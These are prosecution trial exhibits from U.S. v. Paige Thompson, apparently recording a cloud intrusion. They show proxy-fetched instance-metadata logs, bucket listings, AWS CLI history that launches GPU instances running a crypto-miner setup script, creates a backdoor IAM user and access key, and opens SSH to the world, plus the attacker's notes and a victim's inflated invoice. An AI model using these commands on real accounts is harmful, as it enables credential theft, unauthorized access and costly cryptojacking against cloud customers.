43  http://52.87.83.135:80         "LastUpdated" : "2019-04-18T22:26:14Z",
44  http://52.87.83.135:80         "InstanceProfileArn" : "arn:aws:iam::590710864528:instance-profile/                                   ,
45  http://52.87.83.135:80         "InstanceProfileId" : "AIPAJB4KQ6KV6FHVDDW36"
46  http://52.87.83.135:80 }</pre></body></html>https://13.52.44.117:443   {
47  https://13.52.44.117:443          "Code" : "Success",
48  https://13.52.44.117:443          "LastUpdated" : "2019-04-19T17:45:12Z",
49  https://13.52.44.117:443          "InstanceProfileArn" : "arn:aws:iam::254214173625:instance-profile                   ",
50  https://13.52.44.117:443          "InstanceProfileId" : "AIPAJZBH4KPUVYKS5QQDU"
51  https://13.52.44.117:443          }http://54.183.173.34:8000 {
52  http://54.183.173.34:8000          "InstanceProfileArn": "arn:aws:iam::503276176098:instance-profile/              ,
53  http://54.183.173.34:8000          "InstanceProfileId": "AIPALDPUOWFEIVPNDRHFY",
54  http://54.183.173.34:8000          "Code": "Success",
55  http://54.183.173.34:8000          "LastUpdated": "2019-34-18T23:34:39Z"
56  http://54.183.173.34:8000          }http://54.183.173.34:8080 {
57  http://54.183.173.34:8080          "InstanceProfileArn": "arn:aws:iam::513932806757:instance-profile/      -
58  http://54.183.173.34:8080          "InstanceProfileId":
59  http://54.183.173.34:8080          "Code": "Success",
60  http://54.183.173.34:8080          "LastUpdated": "2019-34-18T23:34:39Z"
61  http://54.183.173.34:8080          }http://34.210.95.136:3128 {
62  http://34.210.95.136:3128          "Code" : "Success",
63  http://34.210.95.136:3128          "LastUpdated" : "2019-04-19T17:43:42Z",
64  http://34.210.95.136:3128          "InstanceProfileArn" : "arn:aws:iam::007048575156:instance-profile/                      ",
65  http://34.210.95.136:3128          "InstanceProfileId" :                    "
66  http://34.210.95.136:3128          }http://34.210.95.136:3129 {
67  http://34.210.95.136:3129          "Code" : "Success",
68  http://34.210.95.136:3129          "LastUpdated" : "2019-04-19T17:43:42Z",
69  http://34.210.95.136:3129          "InstanceProfileArn" : "arn:aws:iam::007048575156:instance-profile/
70  http://34.210.95.136:3129          "InstanceProfileId" :
```

807-004

| | | |
|---|---|---|
| 3145 | https://13.52.44.117:443 | * Rebuilt URL to: ldap.amazon.com:389/ |
| 3146 | https://13.52.44.117:443 | *   Trying 13.52.44.117... |
| 3147 | https://13.52.44.117:443 | * TCP_NODELAY set |
| 3148 | https://13.52.44.117:443 | * Connected to 13.52.44.117 (13.52.44.117) port 443 (#0) |
| 3149 | https://13.52.44.117:443 | } [5 bytes data] |
| 3150 | https://13.52.44.117:443 | * TLSv1.2 (OUT), TLS handshake, Client hello (1): |
| 3151 | https://13.52.44.117:443 | } [167 bytes data] |
| 3152 | https://13.52.44.117:443 | * TLSv1.2 (IN), TLS handshake, Server hello (2): |
| 3153 | https://13.52.44.117:443 | { [93 bytes data] |
| 3154 | https://13.52.44.117:443 | * TLSv1.2 (IN), TLS handshake, Certificate (11): |
| 3155 | https://13.52.44.117:443 | { [4601 bytes data] |
| 3156 | https://13.52.44.117:443 | * TLSv1.2 (IN), TLS handshake, Server key exchange (12): |
| 3157 | https://13.52.44.117:443 | { [300 bytes data] |
| 3158 | https://13.52.44.117:443 | * TLSv1.2 (IN), TLS handshake, Server finished (14): |
| 3159 | https://13.52.44.117:443 | { [4 bytes data] |
| 3160 | https://13.52.44.117:443 | * TLSv1.2 (OUT), TLS handshake, Client key exchange (16): |
| 3161 | https://13.52.44.117:443 | } [37 bytes data] |
| 3162 | https://13.52.44.117:443 | * TLSv1.2 (OUT), TLS change cipher, Client hello (1): |
| 3163 | https://13.52.44.117:443 | } [1 bytes data] |
| 3164 | https://13.52.44.117:443 | * TLSv1.2 (OUT), TLS handshake, Finished (20): |
| 3165 | https://13.52.44.117:443 | } [16 bytes data] |
| 3166 | https://13.52.44.117:443 | * TLSv1.2 (IN), TLS handshake, Finished (20): |
| 3167 | https://13.52.44.117:443 | { [16 bytes data] |
| 3168 | https://13.52.44.117:443 | * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384 |
| 3169 | https://13.52.44.117:443 | * Proxy certificate: |
| 3170 | https://13.52.44.117:443 | *  subject: OU=Domain Control Validated; OU=EssentialSSL Wildcard; CN=* |
| 3171 | https://13.52.44.117:443 | *  start date: Sep 12 00:00:00 2018 GMT |
| 3172 | https://13.52.44.117:443 | *  expire date: Sep 12 23:59:59 2019 GMT |
| 3173 | https://13.52.44.117:443 | *  issuer: C=GB; ST=Greater Manchester; L=Salford; O=COMODO CA Limited; CN=COMODO RSA Domain Validation Secure Server CA |
| 3174 | https://13.52.44.117:443 | *  SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway. |
| 3175 | https://13.52.44.117:443 | * allocate connect buffer! |
| 3176 | https://13.52.44.117:443 | * Establish HTTP proxy tunnel to ldap.amazon.com:389 |
| 3177 | https://13.52.44.117:443 | } [5 bytes data] |
| 3178 | https://13.52.44.117:443 | > CONNECT ldap.amazon.com:389 HTTP/1.1 |
| 3179 | https://13.52.44.117:443 | > Host: ldap.amazon.com:389 |
| 3180 | https://13.52.44.117:443 | > User-Agent: curl/7.60.0 |
| 3181 | https://13.52.44.117:443 | > Proxy-Connection: Keep-Alive |
| 3182 | https://13.52.44.117:443 | > |
| 3183 | https://13.52.44.117:443 | { [5 bytes data] |
| 3184 | https://13.52.44.117:443 | < HTTP/1.1 500 Internal Server Error |
| 3185 | https://13.52.44.117:443 | < Date: Fri, 19 Apr 2019 23:09:17 GMT |
| 3186 | https://13.52.44.117:443 | < Server: Apache/2.4.29 (Ubuntu) |
| 3187 | https://13.52.44.117:443 | < Content-Length: 613 |
| 3188 | https://13.52.44.117:443 | < Connection: close |
| 3189 | https://13.52.44.117:443 | < Content-Type: text/html; charset=iso-8859-1 |
| 3190 | https://13.52.44.117:443 | < |
| 3191 | https://13.52.44.117:443 | * The requested URL returned error: 500 |
| 3192 | https://13.52.44.117:443 | * CONNECT phase completed! |
| 3193 | https://13.52.44.117:443 | * Connection #0 to host 13.52.44.117 left intact |

```
listbuckets.log
676  https://3.120.71.226:443                    "CreationDate": "2019-01-28T16:21:24.000Z"
677  https://3.120.71.226:443                },
678  https://3.120.71.226:443                {
679  https://3.120.71.226:443                    "Name": "wepa-logsbucket-73t1warqaea2",
680  https://3.120.71.226:443                    "CreationDate": "2019-01-28T16:22:14.000Z"
681  https://3.120.71.226:443                },
682  https://3.120.71.226:443                {
683  https://3.120.71.226:443                    "Name": "wepa-logsbucket-17x9hjt7zegc",
684  https://3.120.71.226:443                    "CreationDate": "2019-01-28T16:22:15.000Z"
685  https://3.120.71.226:443                },
686  https://3.120.71.226:443                {
687  https://3.120.71.226:443                    "Name": "wyndham-logsbucket-1360690cvs21u",
688  https://3.120.71.226:443                    "CreationDate": "2019-01-28T16:22:40.000Z"
689  https://3.120.71.226:443                }
690  https://3.120.71.226:443            ],
691  https://3.120.71.226:443            "Owner": {
692  https://3.120.71.226:443                "ID": "844638f154638343daf5373b2ead5a79e3f8a78eb45e7ce8ae1d950e28066fc3"
693  https://3.120.71.226:443            }
694  https://3.120.71.226:443        }
695  https://54.200.150.203:8001  ecsInstanceRole
696  https://54.200.150.203:8001
697  https://54.200.150.203:8001  An error occurred (AuthorizationHeaderMalformed) when calling the ListBuckets operation: The authorization header is malformed; a non-empty Access Key (AKID) must be provided in the credential.
698  http://13.52.44.117:80
699  http://13.52.44.117:80
700  http://13.52.44.117:80  An error occurred (AuthorizationHeaderMalformed) when calling the ListBuckets operation: The authorization header is malformed; a non-empty Access Key (AKID) must be provided in the credential.
701  http://13.232.182.109:3128  Ec2-S3-in-window
```

807-006

# EXHIBIT 808

mega_metadata.txt ✖

```
629        ../metadata_old/18.208.62.195.metadata.443:ami-id
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 808
Admitted_____

🖫 11-3-19.443.log ⊠

```
743
744   {
745       "Code" : "Success",
746       "LastUpdated" : "2019-03-12T04:35:09Z",
747       "InstanceProfileArn" : "arn:aws:iam::        7507:instance-profile/
748       "InstanceProfileId" : "
```

808-002



```
aws.commands

146     973  aws ec2 create-key-pair --region eu-west-2
147     977  aws ec2 run-instances --region eu-west-2 --instance-type p3.16xlarge --count 1 --image-id ami-07dc734dc14746eab --associate-public-ip-address --security-group-ids sg-9c32cef5 --instance-initiated-shutdown-behavior terminate
             --key-name default --user-data file://minersetup_eth.sh
148     978  aws ec2 run-instances --region eu-west-2 --instance-type p3.8xlarge --count 1 --image-id ami-07dc734dc14746eab --associate-public-ip-address --security-group-ids sg-9c32cef5 --instance-initiated-shutdown-behavior terminate
             --key-name default --user-data file://minersetup_eth.sh
149     981  aws ec2 authorize-security-group-ingress --group-id sg-9c32cef5 --protocol tcp --port 22 --cidr 0.0.0.0/0 --region eu-west-1
150     982  aws ec2 authorize-security-group-ingress --group-id sg-9c32cef5 --protocol tcp --port 22 --cidr 0.0.0.0/0 --region eu-west-2
```

aws commands

850

aws commands

```
1022
1023    7636  aws iam create-user --user-name default
1024    7637  aws iam create-access-key --user-name default\n
1025    7638  aws iam put-user-policy --user-name default --policy-name DefaultPolicy --policy-document file:///mnt/export2/DefaultPolicy\n
1026    7639  aws iam list-users
1027    7640  aws --profile ec2service iam list-users
1028    7641  nano ~/.aws/credentials
1029    7642  aws --profile protectionprod iam list-users
1030    7643  aws --profile protectionprod iam list-buckets
1031    7644  aws --profile protectionprod s3api list-buckets
1032    7645  aws organizations
1033    7646  aws organizations describe-account
1034    7647  aws organizations describe-organization
1035    7648  aws admin describe-organization
1036    7649  aws --profile admin organizations describe-organization
1037    7650  aws --profile protectionprod organizations describe-organization
1038    7651  aws --profile astem organizations describe-organization
1039    7652  aws --profile default ec2service s3api list-buckets
1040    7653  aws ec2service s3api list-buckets
1041    7654  aws --profile default s3api list-buckets
```

📄 notes2 ✖

```
1    hit this before
2    https://18.208.62.195:443        {
3    https://18.208.62.195:443          "Code" : "Success",
4    https://18.208.62.195:443          "LastUpdated" : "2019-04-18T02:57:11Z",
5    https://18.208.62.195:443          "InstanceProfileArn" : "arn:aws:iam::         7507:instance-
6    https://18.208.62.195:443          "InstanceProfileId" : "
7
```

notes2

88
89  Another unfixed previously used account
90
91
92  An error occurred (InvalidKeyPair.Duplicate) when calling the CreateKeyPair operation: The keypair 'default' already exists.
93



# EXHIBIT 809

**mega_metadata.txt** ✖

```
364    ../metadata_old/52.48.80.230.metadata.443:ami-id
365    ../metadata_old/52.41.122.83.metadata.443:ami-id
366    ../metadata_old/3.16.148.71.metadata.8081:ami-id
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 809
Admitted_____

7-03-19.443.log

```
119

120     {
121       "Code" : "Success",
122       "LastUpdated" : "2019-03-08T04:41:53Z",
123       "InstanceProfileArn" : "arn:aws:iam::          2642:instance-profile/
124       "InstanceProfileId" : "
```

11-3-19.443.log

```
152

153   {
154     "Code" : "Success",
155     "LastUpdated" : "2019-03-12T04:41:19Z",
156     "InstanceProfileArn" : "arn:aws:iam::        2642:instance-profile/
157     "InstanceProfileId" :
```

809-003

aws.commands

```
26 [redacted]
28 aws ec2 describe-instances --region eu-north-1
29 aws ec2 terminate-instances --instance-ids i-0d750886a37bc58fe --region eu-north-1
30 aws ec2 run-instances --region eu-west-2 --instance-type p3.8xlarge --count 2 --image-id ami-5e9c1520 --key-name default --subnet-id subnet-f5b3b08d --associate-public-ip-address --security-group-ids sg-34d53f5d
31 aws ec2 run-instances --region eu-west-2 --instance-type p3.8xlarge --count 2 --image-id ami-5e9c1520 --key-name default  --associate-public-ip-address --security-group-ids sg-34d53f5d
32 aws ec2 describe-security-groups --region eu-west2
33 aws ec2 create-key-pair --key-name default --region eu-west-2
39 aws ec2 run-instances --region eu-west-2 --instance-type p3.8xlarge --count 2 --image-id ami-07dc734dc14746eab --key-name default  --associate-public-ip-address --security-group-ids sg-7e56b917
40 aws ec2 authorize-security-group-ingress --group-id sg-7e56b917 --protocol tcp --port 22 --cidr 0.0.0.0/0 --region eu-west-2 --region eu-west-2
41 ls /home/erratic/aws_scan/.ssh/eu-west-2.id_rsa
47 aws ec2 run-instances --region eu-west-2 --instance-type p3.8xlarge --count 1 --image-id ami-07dc734dc14746eab --key-name default  --associate-public-ip-address --security-group-ids sg-7e56b917
50 aws ec2 run-instances --region eu-west-2 --instance-type p3.2xlarge --count 1 --image-id ami-07dc734dc14746eab --key-name default  --associate-public-ip-address --security-group-ids sg-7e56b917
51 aws ec2 describe-instances --region eu-west-2 |less
53 aws ec2 describe-instances --region eu-west-2 | grep IPAddress
54 aws ec2 describe-instances --region eu-west-2 | grep IpAddress
78 aws ec2 terminate-instances --instance-id i-08971fdb6787e9c66
79 aws ec2 terminate-instances --instance-id i-08971fdb6787e9c66  --region us-west-2
80 aws ec2 describe-instances --region eu-west-2 | jq -r '.Reservations | .[] | .Instances | .[] | .InstanceId' | parallel aws ec2 modify-instance-attribute --instance-id {} --instance-initiated-shutdown-behavior terminate --region eu-west-2
82 aws ec2 run-instances --region us-west-2 --instance-type c5n.large --count 1 --image-id ami-005bdb005fb00e791 --key-name default  --associate-public-ip-address --security-group-ids sg-0d2c65751b2642544
102 aws ec2 create-key-pair --region us-west-2 --key-name _
105 aws ec2 terminate-instances --instance-ids i-0bd2fed6a6e7f7e41
106 aws ec2 terminate-instances --instance-ids i-0bd2fed6a6e7f7e41 --region us-west-2
107 aws ec2 run-instances --region us-west-2 --instance-type c5n.large --count 1 --image-id ami-005bdb005fb00e791 --key-name _  --associate-public-ip-address --security-group-ids sg-0d2c65751b2642544 --instance-initiated-shutdown-behavior terminate
```

```
aws.commands

124
125   927  aws ec2 run-instances --region eu-west-2 --instance-type p3.16xlarge --count 1 --image-id ami-07dc734dc14746eab --associate-public-ip-address --security-group-ids sg-16b6717f --instance-initiated-shutdown-behavior terminate
           --user-data file://minersetup_eth.sh
126   928  aws ec2 run-instances --region eu-west-2 --instance-type p3.16xlarge --count 1 --image-id ami-07dc734dc14746eab --associate-public-ip-address --security-group-ids sg-7e56b917 --instance-initiated-shutdown-behavior terminate
           --user-data file://minersetup_eth.sh --key-name default
127   930  aws ec2 describe-security-groups --group-ids sg-7e56b917
128   931  aws ec2 describe-security-groups --group-ids sg-7e56b917 --region eu-west-2
129   941  aws ec2 modify-instance-attribute --instance-ids i-09a54ea0fa4d3b027 --user-data ""
130   942  aws ec2 modify-instance-attribute --instance-id i-09a54ea0fa4d3b027 --user-data "" --region eu-west-2
131   943  aws ec2 modify-instance-attribute --instance-id i-09a54ea0fa4d3b027 --user-data="" --region eu-west-2
132   944  aws ec2 modify-instance-attribute --instance-id i-09a54ea0fa4d3b027 --user-data file:///dev/null --region eu-west-2
133   945  aws ec2 modify-instance-attribute --instance-id i-09a54ea0fa4d3b027 --user-data="{}" --region eu-west-2
134   946  aws ec2 modify-instance-attribute --instance-id i-09a54ea0fa4d3b027 --user-data="{}" --region eu-west-2
135   947  aws ec2 modify-instance-attribute --instance-id i-09a54ea0fa4d3b027 --user-data='{"Value": ""}' --region eu-west-2
136   948  aws ec2 modify-instance-attribute --instance-id i-09a54ea0fa4d3b027 --user-data='{"Value": "none"}' --region eu-west-2
137   949  aws ec2 modify-instance-attribute --instance-id i-09a54ea0fa4d3b027 --user-data='{"Value": ""}' --region eu-west-2
138   950  aws ec2 run-instances --region eu-west-2 --instance-type p3.16xlarge --count 1 --image-id ami-07dc734dc14746eab --associate-public-ip-address --security-group-ids sg-7e56b917 --instance-initiated-shutdown-behavior terminate
           --user-data --key-name default
139   951  aws ec2 run-instances --region eu-west-2 --instance-type p3.16xlarge --count 1 --image-id ami-07dc734dc14746eab --associate-public-ip-address --security-group-ids sg-7e56b917 --instance-initiated-shutdown-behavior terminate
           --key-name default
```

# EXHIBIT 810

mega_metadata.txt ❎

```
300    ../metadata_old/34.239.113.195.metadata.443:ami-id
301    ../metadata_old/18.191.157.180.metadata.80:ami-id
302    ../metadata_old/52.212.49.160.metadata.82:ami-id
303    ../metadata_old/52.220.58.82.metadata.81:ami-id
304    ../metadata_old/52.56.232.56.metadata.443:ami-id
305    ../metadata_old/18.234.97.18.metadata.443:ami-id
306    ../metadata_old/18.213.111.76.metadata.443:ami-id
307    ../metadata_old/35.182.34.198.metadata.808:ami-id
308    ../metadata_old/52.76.48.213.metadata.443:ami-id
309    ../metadata_old/3.121.200.114.metadata.443:ami-id
310    ../metadata_old/54.173.210.136.metadata.443:ami-id
311    ../metadata_old/52.64.158.166.metadata.80:ami-id
312    ../metadata_old/13.113.12.133.metadata.80:ami-id
313    ../metadata_old/35.153.226.225.metadata.80:ami-id
314    ../metadata_old/18.217.40.206.metadata.8001:ami-id
315    ../metadata_old/122.248.239.99.metadata.443:ami-id
316    ../metadata_old/107.23.48.26.metadata.443:ami-id
317    ../metadata_old/54.234.236.194.metadata.80:ami-id
318    ../metadata_old/13.251.146.92.metadata.443:ami-id
319    ../metadata_old/54.166.183.10.metadata.3128:ami-id
320    ../metadata_old/52.78.213.1.metadata.8888:ami-id
321    ../metadata_old/54.84.204.162.metadata.443:ami-id
322    ../metadata_old/34.220.181.209.metadata.3128:ami-id
323    ../metadata_old/54.232.248.219.metadata.443:ami-id
324    ../metadata_old/35.169.98.216.metadata.8443:ami-id
325    ../metadata_old/18.209.225.93.metadata.80:ami-id
326    ../metadata_old/34.227.67.245.metadata.3128:ami-id
327    ../metadata_old/54.80.21.207.metadata.3128:ami-id
328    ../metadata_old/35.154.211.231.metadata.443:ami-id
329    ../metadata_old/34.196.59.204.metadata.8888:ami-id
330    ../metadata_old/18.225.10.207.metadata.80:ami-id
331    ../metadata_old/18.204.247.252.metadata.443:ami-id
332    ../metadata_old/63.34.213.125.metadata.443:ami-id
333    ../metadata_old/34.239.93.133.metadata.443:ami-id
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 810
Admitted_____



aws.commands

832

833   7036   aws ec2 describe-instances --region ap-northeast-2
834   7037   aws ec2 describe-instances --region ap-northeast-1



810-003



```
 notes

18
19   opsworks?
20

21
22    ec2 read access and s3api read
23

24
25
26     guess whos back
27

28
29
30    apperian ec2 readonly / s3api limited
31

32
33
```

810-004

# EXHIBIT 811

```
113    402  aws --region us-west-2 --profile safesocial2 iot list-jobs
114

115    909  aws ec2 run-instances --region eu-west-2 --instance-type p3.16xlarge --count 2 --image-id ami-08d658f84a6d84a80
            --associate-public-ip-address --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --user-data
            file://minersetup_eth.sh
116    910  aws ec2 run-instances --region eu-west-1 --instance-type p3.16xlarge --count 2 --image-id ami-08d658f84a6d84a80
            --associate-public-ip-address --security-group-ids sg-0b05706e --instance-initiated-shutdown-behavior terminate --user-data
            file://minersetup_eth.sh
117    911  aws ec2 describe-subnets --region eu-west-1
118    912  aws ec2 describe-vpcs --region eu-west-1
119    913  aws ec2 create-default-vpc --region eu-west-1
120    914  aws ec2 describe-vpcs --region eu-west-2
121    915  aws ec2 run-instances --region eu-west-2 --instance-type p3.8xlarge --count 1 --image-id ami-07dc734dc14746eab --associate-public-ip-address
            --security-group-ids sg-16b6717f --instance-initiated-shutdown-behavior terminate --user-data file://minersetup_eth.sh
122

123

124

125    927  aws ec2 run-instances --region eu-west-2 --instance-type p3.16xlarge --count 1 --image-id ami-07dc734dc14746eab
            --associate-public-ip-address --security-group-ids sg-16b6717f --instance-initiated-shutdown-behavior terminate --user-data
            file://minersetup_eth.sh
126    928  aws ec2 run-instances --region eu-west-2 --instance-type p3.16xlarge --count 1 --image-id ami-07dc734dc14746eab
            --associate-public-ip-address --security-group-ids sg-7e56b917 --instance-initiated-shutdown-behavior terminate --user-data
            file://minersetup_eth.sh --key-name default
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 811
Admitted_____

# EXHIBIT 812

parsed

```
25

26    164  aws ec2 describe-instances --region us-east-1 describe-instances
27    165  aws ec2 run-instances --region us-west-2 --instance-type t3.micro --count 1 --image-id ami-005bdb005fb00e791 --key-name _
            --associate-public-ip-address --security-group-ids sg-0d2c65751b2642544 --instance-initiated-shutdown-behavior terminate
28    166  aws ec2 run-instances --region us-west-2 --instance-type t3.micro --count 1 --image-id ami-005bdb005fb00e791 --key-name _
            --associate-public-ip-address --security-group-ids sg-c719f0ae --instance-initiated-shutdown-behavior terminate
29    167  aws ec2 run-instances --region eu-west-2 --instance-type t3.micro --count 1 --image-id ami-005bdb005fb00e791
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 812
Admitted_____

# EXHIBIT 901



Account number:
_____0924

Bill to Address:
Survox Inc.
ATTN: Danny Wong CC: Ken Keyes
11 AIRPORT BLVD
SOUTH SAN FRANCISCO , CA , 94080-6530 ,
US

## Amazon Web Services, Inc. Invoice

Email or talk to us about your AWS account or bill, visit aws.amazon.com/contact-us/

### Invoice Summary

| | |
|---|---|
| Invoice Number: | 9485 |
| | Please include this invoice number with your payment |
| Invoice Date: | April 3 , 2019 |
| **TOTAL AMOUNT DUE ON May 3 , 2019** | **$53,454.01** |

### This invoice is for the billing period March 1 - March 31 , 2019

Greetings from Amazon Web Services, we're writing to provide you with an electronic invoice for your use of AWS services. Additional information about your bill, individual service charge details, and your account history are available on the Account Activity Page.

| Summary | |
|---|---|
| **AWS Service Charges** | **$53,454.01** |
| Charges | $53,454.91 |
| Credits | ($0.90) |
| Tax * | $0.00 |
| **Total for this invoice** | **$53,454.01** |

| Detail for Consolidated Bill | |
|---|---|
| **AWS Lambda** | **$0.00** |
| Charges | $0.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Simple Storage Service** | **$12.92** |
| Charges | $12.92 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.

** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

Electronic funds transfer details:
Bank Name: Wells Fargo NA
Account Name: Amazon Web Services, Inc.
Bank Address:
420 Montgomery Street
San Francisco CA 94163
Checking Account Number: _____0227
ABA Routing Number: _____0248
Wire Routing Number: _____0248
SWIFT Code: WFBIUS6SXXX

or Mail payment to:
Amazon Web Services, Inc.
PO BOX 84023
Seattle, WA 98124-8423, US

1

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 901
Admitted_____

| AWS Data Transfer | $54.48 |
|---|---|
| Charges | $54.48 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Glacier** | **$0.16** |
| Charges | $0.16 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Relational Database Service** | **$283.22** |
| Charges | $283.22 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AWS Support (Business)** | **$3,508.63** |
| Charges | $3,508.63 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Elastic Compute Cloud** | **$49,222.85** |
| Charges | $49,222.85 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon DynamoDB** | **$181.66** |
| Charges | $181.66 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

Electronic funds transfer details:
Bank Name: Wells Fargo NA
Account Name: Amazon Web Services, Inc.
Bank Address:
420 Montgomery Street
San Francisco CA 94163
Checking Account Number:        0227
ABA Routing Number:        0248
Wire Routing Number:        0248
SWIFT Code: WFBIUS6SXXX

or Mail payment to:
Amazon Web Services, Inc.
PO BOX 84023
Seattle, WA 98124-8423, US

2

901-002

| | |
|---|---|
| CT | $0.00 |
| **Amazon Route 53** | **$13.66** |
| Charges | $13.66 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Simple Notification Service** | **$0.00** |
| Charges | $0.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AWS Config** | **$5.51** |
| Charges | $5.51 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AmazonCloudWatch** | **$0.00** |
| Charges | $0.90 |
| Credits | ($0.90) |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Elastic File System** | **$2.80** |
| Charges | $2.80 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AWS CloudTrail** | **$0.00** |
| Charges | $0.00 |
| VAT ** | $0.00 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

Electronic funds transfer details:
Bank Name: Wells Fargo NA
Account Name: Amazon Web Services, Inc.
Bank Address:
420 Montgomery Street
San Francisco CA 94163
Checking Account Number:        0227
ABA Routing Number:        0248
Wire Routing Number:        0248
SWIFT Code: WFBIUS6SXXX

or Mail payment to:
Amazon Web Services, Inc.
PO BOX 84023
Seattle, WA 98124-8423, US

3

| | |
|---|---|
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AWS Key Management Service** | **$0.00** |
| Charges | $0.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Virtual Private Cloud** | **$90.00** |
| Charges | $90.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Kinesis** | **$78.12** |
| Charges | $78.12 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

Electronic funds transfer details:
Bank Name: Wells Fargo NA
Account Name: Amazon Web Services, Inc.
Bank Address:
420 Montgomery Street
San Francisco CA 94163
Checking Account Number:        0227
ABA Routing Number:       0248
Wire Routing Number:       0248
SWIFT Code: WFBIUS6SXXX

or Mail payment to:
Amazon Web Services, Inc.
PO BOX 84023
Seattle, WA 98124-8423, US

901−004

## Please remit payment to Amazon Web Services:

Preferred method of payment is by Electronic Funds Transfer (EFT). Please ensure to reference the invoice number in the descriptive text field of your electronic funds transfer payment.

If you have any questions regarding payment for this invoice, please email aws-receivables-support@email.amazon.com

| Electronic funds transfer details: | or Mail payment to: |
|---|---|
| Bank Name: Wells Fargo NA | Amazon Web Services, Inc. |
| Account Name: Amazon Web Services, Inc. | PO BOX 84023 |
| Bank Address: | Seattle, WA 98124-8423, US |
| 420 Montgomery Street | |
| San Francisco CA 94163 | |
| Checking Account Number: ____0227 | |
| ABA Routing Number: ____0248 | |
| Wire Routing Number: ____0248 | |
| SWIFT Code: WFBIUS6SXXX | |

All web services are sold by Amazon Web Services, Inc.

